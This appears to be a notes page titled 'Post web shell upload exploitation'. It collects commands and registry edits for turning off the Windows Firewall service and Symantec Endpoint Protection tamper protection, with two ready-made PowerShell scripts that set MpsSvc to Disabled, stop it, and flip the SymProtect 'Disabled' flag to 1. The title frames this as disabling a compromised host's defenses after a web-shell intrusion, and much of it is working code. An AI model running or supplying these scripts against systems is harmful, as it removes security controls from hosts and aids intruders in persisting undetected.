Post web shell upload exploitation
Manually stopping the Windows Authenticating Firewall Service (Source)
There are multiple ways to manually stop the Windows Firewall:
- In the Firewall CPL in Control Panel
- In the Advanced Firewall MMC (wf.msc)
- In the Services Manager MMC (services.msc)
- netsh firewall set opmode disable (the netsh firewall context is deprecated from Windows 7 on; the equivalent is netsh advfirewall set allprofiles state off)
- net stop MpsSvc or net stop SharedAccess (depending on the OS)
One of the more common methods used to stop the firewall service as a test is net stop MpsSvc (Windows Vista and later) or net stop SharedAccess (Windows XP), but both of these cause the boot-time filters to load, so traffic is still being filtered even though the service is down. The proper way to completely stop the firewall is to set the service to Disabled in Services Manager first and then stop the service through one of the GUIs or netsh. This prevents the boot-time filters from loading when the firewall service is stopped. Verify the result afterwards with sc query MpsSvc and netsh advfirewall show allprofiles rather than trusting the command that was issued.
Figure 1. Setting the firewall service to Disabled in Services Manager.
To change Startup Type (source):
- Automatic: REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 2 /f
- Manual: REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 3 /f
- Disabled: REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 4 /f
- Automatic (Delayed Start): REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 2 /f
Note: When you change to Automatic (Delayed Start), a new value DelayedAutostart is created and set to 1:
REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v DelayedAutostart /t REG_DWORD /d 1 /f
When you change from Automatic (Delayed Start) back to Automatic, DelayedAutostart changes to 0:
REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v DelayedAutostart /t REG_DWORD /d 0 /f
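The "set to Disabled first, then stop" sequence above as one PowerShell script. This is an added example, not code from the original page or from Microsoft; it uses only the MpsSvc service and Start registry value named above, and the -Restore switch to undo the change is my own addition. Run it from an elevated prompt.

```powershell
# Added example (not from the original page): disable the Windows Firewall service
# the way the text describes: startup type to Disabled BEFORE stopping it, so the
# boot-time filters are not loaded. -Restore reverses the change.
param([switch]$Restore)

$svc = 'MpsSvc'
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"

function Get-StartType {
    # 2 = Automatic, 3 = Manual, 4 = Disabled (same values as the REG add lines above)
    (Get-ItemProperty -Path $key -Name Start).Start
}

if ($Restore) {
    Set-ItemProperty -Path $key -Name Start -Type DWord -Value 2
    Start-Service -Name $svc
    netsh advfirewall set allprofiles state on | Out-Null
} else {
    # 1. Disabled (4) first; "net stop MpsSvc" on its own would still load the
    #    boot-time filters.
    Set-ItemProperty -Path $key -Name Start -Type DWord -Value 4
    # 2. Turn the profiles off through netsh (the non-GUI equivalent of the CPL/MMC).
    netsh advfirewall set allprofiles state off | Out-Null
    # 3. Stop the service. On Windows 8 / Server 2012 and later the service ACL
    #    denies Stop even to Administrators, so expect an error here; the Start=4
    #    change still takes effect at the next boot.
    Stop-Service -Name $svc -Force -ErrorAction Continue
}

# Verify what actually happened rather than trusting the calls above.
Write-Output ("{0} Start={1} Status={2}" -f $svc, (Get-StartType), (Get-Service -Name $svc).Status)
netsh advfirewall show allprofiles state
sc.exe query $svc
```

Note the explicit sc.exe: in PowerShell, sc alone is an alias for Set-Content. The final three lines are the check that matters; a Status of Running with Start=4 means the stop was denied and the host needs a reboot (or SYSTEM-level access) for the change to bite.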
Disable Symantec Tamper Protection (source)
smc.exe [-p password] -stop (the -p password is only needed if a client password has been set)
Also stop ccSvcHst.exe
Investigate C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.2015.2015.105\Bin\sms.dll
The easiest way is to disable it via registry
navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan
on the right hand side you will find a key called Disabled.
If it's 1 - tamper protection is disabled
if it's 0 - tamper protection is enabled
run this, before install, should take care of the issue. Let me know if you have any other questions / concerns
sc delete SPBBCDrv
it will delete the Tamper Protection service and will change its start value to 4 = disabled
Hello Jetjaguar,
I should have mentioned it before
in SAV you will find all the keys under
Intel\LANDesk,
here is the complete path for SAV
HKEY_LOCAL_MACHINE\SOFTWARE\Intel\LANDesk\VirusProtect6\CurrentVersion\Storages\SymProtect\RealTimeScan
you can disable this under registry
Tamper protection won't prevent registry changes.
regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan; on the right hand side set the Disabled key to 1.
Here is a Workaround to Disable the Tamper Protection from SPC 12
Start > Run > regedit
Click OK
Browse to:
HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan\Disabled
By default, Tamper Protection is enabled and ON.
This will be shown as Disabled REG_DWORD 0x00000000 (0)
Disabled = 0
For disabling Tamper Protection (OFF), edit the registry value and set it to 1
This will be shown as Disabled REG_DWORD 0x00000001 (1)
Disabled = 1
Steps to change this registry value:
Right-click [Disabled] and select Modify
Change Value data from 0 to 1
Please Note:
When making this change to the registry for this setting it will only be temporary.
If, for example, the SMC service is restarted, this value will change back to the default value of 0 (TP = enabled = ON). There is no way to permanently set this value in SEP SBE.
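The registry toggle the three posts above describe, as one check-and-set script. This is an added example of my own, not code from the Symantec forum posts; the SEP and SAV paths are the ones quoted in the thread, while the Wow6432Node path and the process check for smc.exe/ccSvcHst.exe are my assumptions (32-bit SEP on 64-bit Windows may keep its keys there). Run from an elevated prompt.

```powershell
# Added example (not from the forum posts above): read the SymProtect "Disabled"
# flag at every candidate path, set it to 1 (Tamper Protection off) where it is
# not already 1, and read it back. 0 = TP on, 1 = TP off.
$candidates = @(
    # SEP path from the thread
    'HKLM:\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan',
    # Assumption: 32-bit SEP on 64-bit Windows is redirected under Wow6432Node
    'HKLM:\SOFTWARE\Wow6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan',
    # legacy SAV path from the thread
    'HKLM:\SOFTWARE\Intel\LANDesk\VirusProtect6\CurrentVersion\Storages\SymProtect\RealTimeScan'
)

function Get-TamperFlag([string]$Path) {
    # Returns $null when the key or the Disabled value is missing.
    (Get-ItemProperty -Path $Path -Name Disabled -ErrorAction SilentlyContinue).Disabled
}

foreach ($p in $candidates) {
    if (-not (Test-Path -Path $p)) { continue }
    $before = Get-TamperFlag $p
    Write-Output ("{0}`n  Disabled before = {1} (0 = TP on, 1 = TP off)" -f $p, $before)
    if ($before -ne 1) {
        try {
            Set-ItemProperty -Path $p -Name Disabled -Type DWord -Value 1 -ErrorAction Stop
            Write-Output ("  Disabled after  = {0}" -f (Get-TamperFlag $p))
        } catch {
            # If the product protects the key, the write fails here and the
            # registry route is closed on this host.
            Write-Output ("  write failed: {0}" -f $_.Exception.Message)
        }
    }
}

# The thread warns that an SMC restart resets the flag to 0, so record which
# Symantec processes are up now and re-run this script after any restart.
Get-Process -Name smc, ccSvcHst -ErrorAction SilentlyContinue | Select-Object Name, Id
```

The read-back after the write is the part to keep: the value reverting to 0 on an SMC restart means a one-off edit tells you nothing about the state a minute later, so re-check before relying on it.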